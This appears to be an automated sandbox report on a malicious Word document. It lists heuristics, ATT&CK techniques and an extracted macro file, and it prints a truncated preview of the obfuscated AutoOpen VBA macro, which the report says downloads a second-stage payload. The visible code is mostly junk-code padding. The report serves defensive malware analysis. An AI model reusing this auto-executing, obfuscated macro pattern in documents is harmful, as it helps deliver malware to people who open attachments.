Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, a common technique for initial execution. The macro is heavily obfuscated, but its presence and the 'OLE_LEGACY_WORDBASIC_AUTOEXEC' and 'OLE_VBA_AUTOOPEN' heuristic firings indicate it is designed to run automatically. The primary function of the macro appears to be downloading and executing a second-stage payload, though the specific URL or payload is not directly discernible due to obfuscation.
Heuristics (5)
- ClamAV: Doc.Malware.00536d-6706117-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6706117-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 110502 bytes | f196f431cf17771386b81d4719b51c60d9841721eb41d6a3836f48be50f4a4b1 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const XyPaDywALOGyfWylusIfemguVobYwIxy = 0
Sub AutoOpen()
On Error Resume Next
Dim neRIXYtokodijarOQIQezPcibeHImAaD(3)
If "wyVebmUjYQZozKEfu" <> "wyVebmUjYQZozKEfu" & CStr(CInt("5182")) Then
Dim VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(3)
If "IiilogYCUpBAT" <> "IiilogYCUpBAT" & CStr(CInt("3454")) Then
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(0) = VarType(VarType(CInt("3454")))
If "IiilogYCUpBAT" <> "3454" Then
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(0) = 3454.5
End If
End If
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(1) = IiilogYCUpBAT & "55"
VuDuVIdAQEVokuGuxoMyHUziNeDaRoSEBAnZgIlyFa(2) = Minute(34543454)
neRIXYtokodijarOQIQezPcibeHImAaD(0) = VarType(VarType(CInt("5182")))
If "wyVebmUjYQZozKEfu" <> "5182" Then
Dim bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(3)
If "reWEgeaYGaBu" <> "reWEgeaYGaBu" & CStr(CInt("197")) Then
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(0) = VarType(VarType(CInt("197")))
If "reWEgeaYGaBu" <> "197" Then
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(0) = 197.8
End If
End If
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(1) = reWEgeaYGaBu & "88"
bABYZOKYKIdEMiHIJEVuiGiHIiIjywOfaHav(2) = Minute(197197)
Dim nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(3)
If "NanmOSAaEfIvopaoho" <> "NanmOSAaEfIvopaoho" & CStr(CInt("9339")) Then
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(0) = VarType(VarType(CInt("9339")))
If "NanmOSAaEfIvopaoho" <> "9339" Then
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(0) = 9339.7
End If
End If
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(1) = NanmOSAaEfIvopaoho & "77"
nIKOpOCIDELITIhyDYCozAnEqanOjIZAxaG(2) = Minute(93399339)
neRIXYtokodijarOQIQezPcibeHImAaD(0) = 5182.9
Dim VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(3)
If "qUrgOqiKDBuzBoBA" <> "qUrgOqiKDBuzBoBA" & CStr(CInt("4356")) Then
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(0) = VarType(VarType(CInt("4356")))
If "qUrgOqiKDBuzBoBA" <> "4356" Then
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(0) = 4356.4
End If
End If
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(1) = qUrgOqiKDBuzBoBA & "44"
VAhuQErJAMIaorEXudeBusuTOiuMIpobIk(2) = Minute(43564356)
Dim xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(3)
If "fiaoCAnywoRuJubYSu" <> "fiaoCAnywoRuJubYSu" & CStr(CInt("4954")) Then
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(0) = VarType(VarType(CInt("4954")))
If "fiaoCAnywoRuJubYSu" <> "4954" Then
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(0) = 4954.5
End If
End If
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(1) = fiaoCAnywoRuJubYSu & "55"
xApinAWONyxAtYroZIZuruqjYPuvORAZIRAW(2) = Minute(49544954)
End If
Dim JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(3)
If "iAZoQOCAGACiMUwyCePACAae" <> "iAZoQOCAGACiMUwyCePACAae" & CStr(CInt("2426")) Then
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(0) = VarType(VarType(CInt("2426")))
If "iAZoQOCAGACiMUwyCePACAae" <> "2426" Then
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(0) = 2426.4
End If
End If
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(1) = iAZoQOCAGACiMUwyCePACAae & "44"
JeZiiuSycoBodpyLEyfYJyfYsetFIPyJi(2) = Minute(24262426)
Dim dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(3)
If "QINoJAVajYxYVes" <> "QINoJAVajYxYVes" & CStr(CInt("1894")) Then
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(0) = VarType(VarType(CInt("1894")))
If "QINoJAVajYxYVes" <> "1894" Then
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(0) = 1894.1
End If
End If
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(1) = QINoJAVajYxYVes & "1010"
dUpoFECEhuvUGUzaseRibibeKeBYdasADEsAxAQI(2) = Minute(18941894)
End If
Dim KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(3)
If "MONORufiqoX" <> "MONORufiqoX" & CStr(CInt("693")) Then
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(0) = VarType(VarType(CInt("693")))
If "MONORufiqoX" <> "693" Then
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(0) = 693.8
End If
End If
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(1) = MONORufiqoX & "88"
KINAkeSygsiBEPEMaHigwyteMISYmabuderOFJaCUq(2) = Minute(693693)
neRIXYtokodijarOQIQezPci
... (truncated)